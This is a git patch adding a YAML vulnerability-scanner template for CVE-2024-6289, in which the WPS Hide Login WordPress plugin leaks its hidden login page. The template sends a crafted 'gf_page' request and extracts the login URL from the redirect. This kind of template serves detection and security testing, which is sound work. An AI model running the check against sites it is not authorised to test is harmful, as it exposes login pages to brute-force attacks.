From 4b77efe4b8629265159e52f95cc483f6f10b19e4 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 15 Jul 2024 21:23:47 +0300 Subject: [PATCH] add CVE-2024-6289 --- http/cves/2024/CVE-2024-6289.yaml | 46 +++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 http/cves/2024/CVE-2024-6289.yaml diff --git a/http/cves/2024/CVE-2024-6289.yaml b/http/cves/2024/CVE-2024-6289.yaml new file mode 100644 index 0000000000..ba918d7caf --- /dev/null +++ b/http/cves/2024/CVE-2024-6289.yaml @@ -0,0 +1,46 @@ +id: CVE-2024-6289 + +info: + name: WPS Hide Login < 1.9.16.4 - Hidden Login Page Disclosure + author: securityforeveryone + severity: medium + description: | + The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page. + reference: + - https://wpscan.com/vulnerability/fd6d0362-df1d-4416-b8b5-6e5d0ce84793/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-6289 + - https://www.sprocketsecurity.com/resources/discovering-wp-admin-urls-in-wordpress-with-gravityforms/ + classification: + epss-score: 0.00043 + epss-percentile: 0.09266 + metadata: + verified: true + max-request: 1 + vendor: wpserveur + product: wps_hide_login + framework: wordpress + publicwww-query: "/wp-content/plugins/wps-hide-login/" + tags: cve,cve2024,bypass,wp-plugin,wpscan,wordpress + +http: + - raw: + - | + GET /wp-content/plugins/wps-hide-login/readme.txt HTTP/1.1 + Host: {{Hostname}} + + - | + GET /?gf_page=randomstring HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body_1,"WPS Hide Login") && status_code_1 == 200' + - '!contains(tolower(location_2), "wp-login.php")' + - 'contains(header_2,"%2F%3Fgf_page%3Drandomstring&reauth=1")' + condition: and + + extractors: + - type: kval + kval: + - location